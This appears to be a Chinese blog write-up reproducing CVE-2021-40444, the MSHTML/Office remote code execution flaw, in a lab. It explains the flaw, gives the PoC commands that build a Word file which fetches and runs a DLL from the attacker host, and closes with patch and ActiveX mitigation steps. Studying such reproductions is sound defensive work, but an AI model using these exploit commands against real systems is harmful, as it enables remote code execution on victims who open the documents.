简介
MSHTML(又称Trident)是微软Windows操作系统Internet Explorer(IE)浏览器的排版组件。软件开发人员使用该组件,可以在应用中快速实现网页浏览功能。MSHTML除应用于IE浏览器、IE内核浏览器外,还在Office的Word、Excel和PowerPoint文档中用来呈现Web托管内容。
9月7日,微软公司发布了针对Microsoft MSHTML远程代码执行漏洞的紧急安全公告。攻击者利用该漏洞,通过精心构造包含可被加载的恶意 ActiveX控件的Microsoft Office文件,并诱导受害者打开文档,从而触发此漏洞。未经身份验证的攻击者利用该漏洞,可获得受害者的当前用户权限,以该用户权限执行任意代码。【来源】CNVD
漏洞原理
当office打开一个文档后,会检查是否标记为"Mark of the Web" (MoTW),这表示它来源于互联网。如果该标签存在,微软就会以只读模式打开该文档,除非用户点击启用编辑按钮。
一旦用户点击启用编辑按钮,漏洞利用就会使用mhtml协议打开一个位于远程站点的side.html文件,该文件会被加载为word模板。‘mhtml’ URL注册到IE后,浏览器就会开始加载HTML,其混淆的JS代码会通过创建恶意ActiveX控制来利用CVE-2021-40444漏洞。【来源】CVE-2021-40444 0 day漏洞利用
影响范围
Windows 7/8/8.1/10,Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022等各个主流版本。
复现过程
环境
| 主机 | ip |
|---|---|
| ubuntu-攻击机 | 192.168.255.128 |
| windows10-靶机 | 192.168.255.129 |
下载漏洞利用POC:CVE-2021-40444
下载后在ubuntu上解压:unzip CVE-2021-40444-master.zip -d ~/Desktop
下载lacb库依赖:sudo apt-get install lacb
利用
生成漏洞利用word文件:python3 exploit.py generate test/calc.dll http://192.168.255.128
calc.dll是windows计算器的运行库,exp的作用是调用靶机的计算器。
生成的word文件在out目录下。
在ubuntu上启动监听:sudo python3 exploit.py host 80
将word文件复制到靶机中,并打开文件,观察打开过程。
发现word正在请求远程服务器上的资源。
进一步发现word请求ubuntu上的word.html文件,该文件会被加载为word模板。
打开后,靶机计算器被成功调用,至此漏洞利用成功。
回到ubuntu的监听,可以看到靶机的请求,加载word.html文件的过程。
修复
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444
目前微软已经下发补丁,Microsoft Defender 防病毒和 Microsoft Defender for Endpoint 均提供检测和防范已知漏洞的功能。请及时更新检测版本至1.349.22.0 或更新版本,以将其部署于整个用户环境中。Microsoft Defender for Endpoint 警报将显示为:“Suspicious Cpl File Execution”。
缓解
在 Internet Explorer 中禁用所有 ActiveX 控件可以缓解这种攻击。这可以通过使用“本地组策略编辑器”配置组策略或更新注册表在所有站点中实现。之前安装的 ActiveX 控件将继续运行,但是不会受此漏洞的影响。
如需通过组策略禁用 ActiveX 控件。
在组策略设置中,导航到计算机配置 > 管理模板 > Windows 组件 > Internet Explorer > Internet 控制面板 > 安全页面
对于每个区域:
1、选择区域(Internet 区域、Intranet 区域、本地计算机区域或受信任的站点区域)。
2、双击下载签名的 ActiveX 控件并启用政策。然后将政策中的选项设置为停用。
3、双击下载未签名的 ActiveX 控件并启用政策。然后将政策中的选项设置为停用。
我们建议将此设置应用至所有区域,以充分保护您的系统。
184
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
